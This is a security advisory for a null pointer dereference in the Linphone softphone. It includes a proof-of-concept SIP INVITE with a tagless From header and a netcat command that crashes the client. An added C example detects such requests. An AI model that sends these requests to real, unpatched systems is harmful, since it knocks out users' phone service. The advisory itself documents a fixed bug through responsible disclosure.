Advisory ID: SYSS-2021-014
Product: Linphone
Manufacturer: Belledonne Communications
Affected Version(s): Desktop 4.2.5-Qt5.14.2 (Core4.4.19)
Tested Version(s): Desktop 4.2.5-Qt5.14.2 (Core4.4.19)
Vulnerability Type: Null Pointer Dereference (CWE-476)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2021-03-26
Solution Date: 2021-09-06
Public Disclosure: 2021-10-13
CVE Reference: -
Author of Advisory: Moritz Abrell

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linphone [1] is an open source SIP-based softphone. It provides
calling, presence and IM features.

If a specially crafted SIP INVITE request is sent to the softphone,
the software crashes.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Sending a SIP INVITE request without a "tag" parameter in the "From"
header to a machine running Linphone causes the Linphone client to
crash due to a NULL pointer dereference.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following SIP INVITE request causes the Linphone client to crash:

INVITE sip:100@192.168.122.168 SIP/2.0
Via: SIP/2.0/UDP 192.168.122.1:40709;branch=z9hG4bK7pqwjtzswe
Max-Forwards: 70
To:
From:
Contact:
Call-ID: 38tn4shategtc3i9gmspx38ds94qb2st
CSeq: 1 INVITE
User-Agent: WireBug
Expires: 600
Content-Length: 0

Notice that the "tag" parameter in the "From" header is missing.

Send it to the machine running Linphone via netcat:

cat invite.txt | nc 192.168.122.168 5060 -u

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer fixed this vulnerability in commit
742334647fcde614c4126834fa9f59931efb2d59 in the public GitHub
repository.
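
Added example, not part of the SySS advisory or of the belle-sip code base: a defensive check that flags INVITE requests whose "From" header carries no "tag" parameter, for logging or filtering in front of clients that are not yet patched. All function names and the sample requests are constructed for illustration; the parser assumes CRLF line endings, no header folding and no whitespace before the colon.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Value of header `name` (compact form `c`) in a raw SIP message; sets *len. */
static const char *sip_header(const char *msg, const char *name, char c, size_t *len) {
    const char *line = strstr(msg, "\r\n");              /* skip the request line */
    size_t nlen = strlen(name);
    while (line && strncmp(line, "\r\n\r\n", 4) != 0) {  /* stop at the blank line */
        line += 2;
        const char *eol = strstr(line, "\r\n");
        if (!eol) eol = line + strlen(line);
        size_t k = strncasecmp(line, name, nlen) == 0 ? nlen : (size_t)((line[0] | 0x20) == c);
        if (k && line[k] == ':') { *len = (size_t)(eol - line) - k - 1; return line + k + 1; }
        line = *eol ? eol : NULL;
    }
    return NULL;
}

/* Copy the From tag into out; returns 1 only for a non-empty tag. RFC 3261
 * 12.1.1 tells a UAS to expect tagless requests, so callers must handle 0. */
int sip_from_tag(const char *msg, char *out, size_t outlen) {
    size_t len = 0, n = 0;
    const char *v = sip_header(msg, "From", 'f', &len);
    if (!v || outlen == 0) return 0;
    const char *end = v + len, *p = v;
    for (const char *q = v; q < end; q++) if (*q == '>') p = q + 1; /* skip URI params */
    for (; p + 5 <= end; p++) {
        if (*p != ';' || strncasecmp(p + 1, "tag=", 4) != 0) continue;
        for (p += 5; p < end && *p != ';' && *p != ' ' && n + 1 < outlen; p++) out[n++] = *p;
        out[n] = '\0';
        return n > 0;
    }
    return 0;
}

int sip_invite_lacks_from_tag(const char *msg) {  /* 1 = INVITE with no From tag */
    char tag[128];
    return strncmp(msg, "INVITE ", 7) == 0 && !sip_from_tag(msg, tag, sizeof tag);
}

static const char WITH_TAG[] =  /* constructed samples, placeholder addresses */
    "INVITE sip:bob@example.invalid SIP/2.0\r\nFrom: <sip:alice@example.invalid>;tag=a1b2\r\n\r\n";
static const char NO_TAG[] =
    "INVITE sip:bob@example.invalid SIP/2.0\r\nFrom: <sip:alice@example.invalid>\r\n\r\n";
int main(void) {
    printf("%d %d\n", sip_invite_lacks_from_tag(WITH_TAG), sip_invite_lacks_from_tag(NO_TAG));
    return 0;
}
```

A "tag" that appears only inside the angle brackets is a URI parameter, not a header parameter, so the check still reports such a request as tagless.
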
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-03-26: Vulnerability reported to manufacturer
2021-04-01: Renewed notification to the manufacturer due to lack of
            feedback
2021-04-07: Renewed notification to the manufacturer due to lack of
            feedback
2021-05-17: Renewed notification to the manufacturer due to lack of
            feedback
2021-05-17: Response and confirmation of the vulnerabilities by the
            manufacturer
2021-09-06: Fix of the vulnerability provided by the manufacturer

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1]: Product website for Linphone:
     https://www.linphone.org/
[2]: SySS Responsible Disclosure Policy:
     https://www.syss.de/en/news/responsible-disclosure-policy/
[3]: Fix by the manufacturer:
     https://github.com/BelledonneCommunications/belle-sip/commit/742334647fcde614c4126834fa9f59931efb2d59

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en